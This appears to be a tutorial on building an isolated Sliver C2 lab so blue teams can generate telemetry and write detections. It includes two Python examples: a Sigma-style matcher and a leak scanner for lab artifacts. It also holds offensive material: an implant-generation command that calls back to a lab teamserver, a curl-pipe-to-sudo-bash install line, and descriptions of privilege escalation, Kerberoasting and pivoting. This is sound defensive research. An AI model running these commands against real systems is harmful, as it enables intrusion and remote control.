Building C2 Infra with Sliver in an Isolated Lab for Defensive Research
Spinning up a Sliver C2 air-gapped is not hacker theater: it is how Blue Teams learn to detect what they will face tomorrow. Hands-on technical walkthrough.
Every time a SOC analyst opens a ticket for 'suspicious beacon', there is a real chance nobody on the team has ever watched a C2 in action with their own eyes. Red Team operators run Sliver, Mythic and Havoc every day, but most defenders only know those frameworks from Mandiant report screenshots. Basilisk OffSec built an isolated VLAN lab with no internet egress specifically to close that gap. The goal is not to attack anything external: it is to generate realistic telemetry so the Blue Team can train detection rules on indicators they generated, controlled and documented themselves. Without that, threat hunting becomes educated guessing.
Sliver is written in Go, maintained by BishopFox, and ships implants for Windows, Linux and macOS over mTLS, WireGuard, HTTP(S) and DNS. Compared to Cobalt Strike it is free, open source and auditable; compared to Mythic it needs less infrastructure for a small lab. Our setup uses a Debian 12 VM as teamserver with 4 vCPU and 8 GB RAM, behind a pfSense that only allows traffic between the C2 VLAN (10.50.10.0/24) and the victim VLAN (10.50.20.0/24). Zero NAT outbound. If you have not built a base lab yet, the path covered in Web Pentesting From Scratch: Building a Safe Lab with DVWA, Juice Shop and Burp Suite is a solid foundation before going further.
Teamserver install is straightforward: 'curl https://sliver.sh/install | sudo bash' works, but in an isolated environment we download the signed binary, verify it with cosign and copy it via a dedicated USB stick. We generate implant profiles with 'generate --mtls 10.50.10.5:8443 --os windows --arch amd64 --skip-symbols --save ./payloads'. The --skip-symbols flag shrinks the binary by 40% and slows down quick reverse engineering, while leaving enough for debugging. On a Windows 11 21H2 lab with Defender real-time protection on, the unobfuscated implant dies in 12 seconds: that is exactly what we want to measure. To understand the delivery chain that precedes the beacon, check Simulated Initial Access: Macros, LNK and ISO in an Isolated Windows 11 Lab.
The educational payoff starts after the beacon checks in. Every operator command (whoami, getsystem, execute-assembly, sideload) produces a process pattern, API call and network footprint that the defensive team needs to recognize. We run Sysmon with the SwiftOnSecurity config, Elastic Agent shipping to a local cluster, and correlate the events with Sigma rules. Across 3 sprints we mapped 47 new detections, from Sliver default named pipes to rundll32 spawns with no command line. That whole pipeline of turning an IOC into a rule is documented in Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule and pairs naturally with what we cover here.
Lateral movement inside the lab is where things get spicy. We spin up a mini-AD with 2 DCs, 4 workstations and a file server, mirroring a mid-size customer topology. With the initial Sliver implant on a low-privilege host, we use rubeus for Kerberoasting, then pivot via WireGuard to reach the DC without ever touching it directly from the teamserver. The techniques in Active Directory Pentest: Step-by-Step Kerberoasting in a GOAD Lab and Pivoting with Chisel and Ligolo-ng: Segmented Networks in a Pentest Lab are basically the same logic applied with different tooling. The point: every hop leaves traces - 4624 with logon type 3, 4769 with weak encryption, anomalous WMI connections - and all of that becomes hunting training material.
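To make the detection side of the last two sections concrete, here is an added example (not code from Sliver, Sigma, Sysmon or Elastic) of a tiny Sigma-style matcher run over constructed Sysmon and Windows Security events. It encodes five of the patterns discussed above as rules: rundll32 started with no command-line parameters, a named pipe matching a lab-observed pattern, a 4769 ticket request with RC4 for a user SPN, a 4624 network logon by a user account, and a process whose parent is the WMI provider host. The event records, the pipe pattern list and the account names are all constructed; the named-pipe list in particular is a placeholder you fill from your own Sysmon EventID 17 telemetry, not a list of Sliver's real pipe names.

```python
"""Mini Sigma-style matcher over constructed Sysmon and Security events.

Added example for this article; not code from Sliver, Sigma, Sysmon or
Elastic. Field names follow Sysmon (EventID 1 ProcessCreate, 17 PipeEvent)
and Windows Security (4624, 4769) conventions. Sample events and the
named-pipe patterns are constructed.
"""

# Placeholder list: populate from your lab's own Sysmon EventID 17 records.
SLIVER_PIPE_PATTERNS = ["\\example-lab-pipe-"]

# Rules use a subset of Sigma syntax: field keys with optional
# |endswith / |startswith / |contains modifiers, list values meaning OR,
# all keys in a block ANDed, and an optional 'filter' block that must NOT match.
RULES = [
    {"title": "rundll32 without command-line parameters",
     "selection": {"EventID": 1, "Image|endswith": "\\rundll32.exe",
                   "CommandLine|endswith": ["rundll32.exe", "rundll32.exe\"", "rundll32"]}},
    {"title": "named pipe matching lab-observed pattern",
     "selection": {"EventID": 17, "PipeName|contains": SLIVER_PIPE_PATTERNS}},
    {"title": "TGS request with RC4 for a user SPN (Kerberoast candidate)",
     "selection": {"EventID": 4769, "TicketEncryptionType": "0x17"},
     "filter": {"ServiceName|endswith": ["$", "krbtgt"]}},   # machine accounts and krbtgt are noise
    {"title": "network logon (type 3) by a user account",
     "selection": {"EventID": 4624, "LogonType": "3"},
     "filter": {"TargetUserName|endswith": "$"}},
    {"title": "process spawned by WMI provider host",
     "selection": {"EventID": 1, "ParentImage|endswith": "\\WmiPrvSE.exe"}},
]


def _match_value(actual, expected, modifier):
    """Compare one field value, case-insensitively, under a Sigma modifier."""
    a, e = str(actual).lower(), str(expected).lower()
    if not modifier:
        return a == e
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "contains":
        return e in a
    raise ValueError(f"unsupported modifier: {modifier}")


def _block_matches(block, event):
    """All keys in a block must match; a list value matches if any entry does."""
    for key, expected in block.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event[field], v, modifier) for v in values):
            return False
    return True


def evaluate(rule, event):
    """Rule fires when selection matches and the filter (if any) does not."""
    if not _block_matches(rule["selection"], event):
        return False
    if rule.get("filter") and _block_matches(rule["filter"], event):
        return False
    return True


def run_rules(events, rules=RULES):
    """Return (event_index, rule_title) for every rule hit, in event order."""
    return [(i, r["title"]) for i, ev in enumerate(events) for r in rules if evaluate(r, ev)]


# Constructed sample telemetry, roughly what 30 minutes of lab beacon activity yields.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\rundll32.exe",            # 0: benign, has args
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL", "ParentImage": "C:\\Windows\\explorer.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\rundll32.exe",            # 1: sacrificial process, no args
     "CommandLine": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Users\\lab\\implant.exe"},
    {"EventID": 17, "Image": "C:\\Windows\\System32\\rundll32.exe",           # 2: pipe from placeholder list
     "PipeName": "\\example-lab-pipe-7f"},
    {"EventID": 4769, "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",  # 3: RC4 for a user SPN
     "IpAddress": "::ffff:10.50.20.11"},
    {"EventID": 4769, "ServiceName": "WS04$", "TicketEncryptionType": "0x17",    # 4: RC4 for machine account
     "IpAddress": "::ffff:10.50.20.14"},
    {"EventID": 4769, "ServiceName": "svc_sql", "TicketEncryptionType": "0x12",  # 5: AES, not flagged
     "IpAddress": "::ffff:10.50.20.11"},
    {"EventID": 4624, "LogonType": "3", "TargetUserName": "j.doe",             # 6: network logon by user
     "IpAddress": "10.50.20.11"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",                  # 7: child of WmiPrvSE
     "CommandLine": "cmd.exe /c whoami", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
]

if __name__ == "__main__":
    for idx, title in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {title}")
```

The matcher is deliberately the smallest thing that behaves like Sigma's selection/filter logic, so the rules can be ported to real Sigma YAML once they have been tuned against the lab's false positives; the RC4 and machine-account filters are exactly the kind of tuning step a first sprint over the mini-AD telemetry forces on you.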
Lab OPSEC matters more than people assume. Even air-gapped, snapshots containing live implants have leaked to public repos when someone uploaded them by accident. Our rule: lab VMs live on a LUKS-encrypted datastore, snapshots never leave the host, and any artifact that needs to exit (Sigma rule, IOC, video) goes through manual review. This connects to the approach in OPSEC for Security Researchers: Building a Personal Threat Model and Metadata Hygiene: Stripping EXIF, PDF and Office Before You Publish - the classic mistake is publishing a report PDF whose metadata hands over username, hostname and even the file path on the researcher's personal laptop.
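The manual review step above is easy to skip under deadline pressure, so here is an added example (not the lab's own tooling) of a pre-publication gate that scans an artifact's text for lab IPs, user-profile paths and known lab identifiers, and does a first-pass check of PDF Info metadata fields. The hostnames, usernames, report excerpt and PDF bytes are constructed; the LAB_IDENTIFIERS list is a placeholder you replace with your own. The PDF check only sees an uncompressed Info dictionary, so it complements rather than replaces a proper metadata-stripping tool.

```python
"""Pre-publication review gate for lab artifacts.

Added example for this article; not the lab's own tooling. Flags lab-internal
IPs, user-profile paths and known lab identifiers in text, plus PDF Info
fields that carry one of those identifiers. Sample data is constructed.
"""
import ipaddress
import re

LAB_NET = ipaddress.ip_network("10.50.0.0/16")           # from the article's lab addressing
LAB_IDENTIFIERS = ("teamserver", "WS04", "labadmin")     # constructed placeholders

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Windows user profile or Linux home directory plus the account name.
PATH_RE = re.compile(r"(?:[A-Za-z]:\\Users\\|/home/)([^\\/\s\"']+)")
# Plain-text PDF Info entries; compressed object streams (PDF 1.5+) are not parsed.
PDF_INFO_RE = re.compile(rb"/(Author|Creator|Producer|Title)\s*\((.*?)\)")


def scan_text(text):
    """Return (kind, value) findings for lab-identifying content in text."""
    findings = []
    for m in IP_RE.finditer(text):
        try:
            ip = ipaddress.ip_address(m.group())
        except ValueError:            # e.g. 999.1.1.1 looks like an IP but is not one
            continue
        if ip in LAB_NET:
            findings.append(("lab-ip", m.group()))
    for m in PATH_RE.finditer(text):
        findings.append(("profile-path", m.group()))
    lower = text.lower()
    for ident in LAB_IDENTIFIERS:
        if ident.lower() in lower:
            findings.append(("identifier", ident))
    return findings


def pdf_info_fields(data):
    """First-pass extraction of uncompressed PDF Info fields from raw bytes."""
    return {k.decode(): v.decode("latin-1") for k, v in PDF_INFO_RE.findall(data)}


def review_gate(text, pdf_bytes=None):
    """Combine text findings with PDF metadata fields that leak a lab identifier."""
    findings = scan_text(text)
    if pdf_bytes:
        for key, value in pdf_info_fields(pdf_bytes).items():
            if any(ident.lower() in value.lower() for ident in LAB_IDENTIFIERS):
                findings.append(("pdf-metadata", f"{key}={value}"))
    return findings


# Constructed report excerpt and a minimal PDF header with an Info dictionary.
SAMPLE_REPORT = """Lab report draft (constructed).
Beacon observed from 10.50.20.11 to teamserver 10.50.10.5:8443.
Screenshot saved to C:\\Users\\labadmin\\Desktop\\beacon.png
External reference IP 8.8.8.8 is outside the lab range.
"""
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< /Author (labadmin) /Creator (Word) >>\nendobj\n"

if __name__ == "__main__":
    for kind, value in review_gate(SAMPLE_REPORT, SAMPLE_PDF):
        print(f"{kind:13} {value}")
```

Run it against every Sigma rule, screenshot caption and report draft before it leaves the host; a non-empty result does not mean the artifact is blocked, it means a human looks at each line before deciding, which is the rule stated above.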
Practical takeaway: if you defend a company and have never watched a Sliver beacon on a screen you control, your detection is theoretical. Block out a full Friday, assemble the lab with pfSense + Debian + 2 Windows, generate an unobfuscated implant, let it run commands for 30 minutes and open Sysmon. You will walk away with more hunting material than three paid courses combined - and zero legal risk, because everything happens inside the 10.50.0.0/16 VLAN that talks to nobody outside.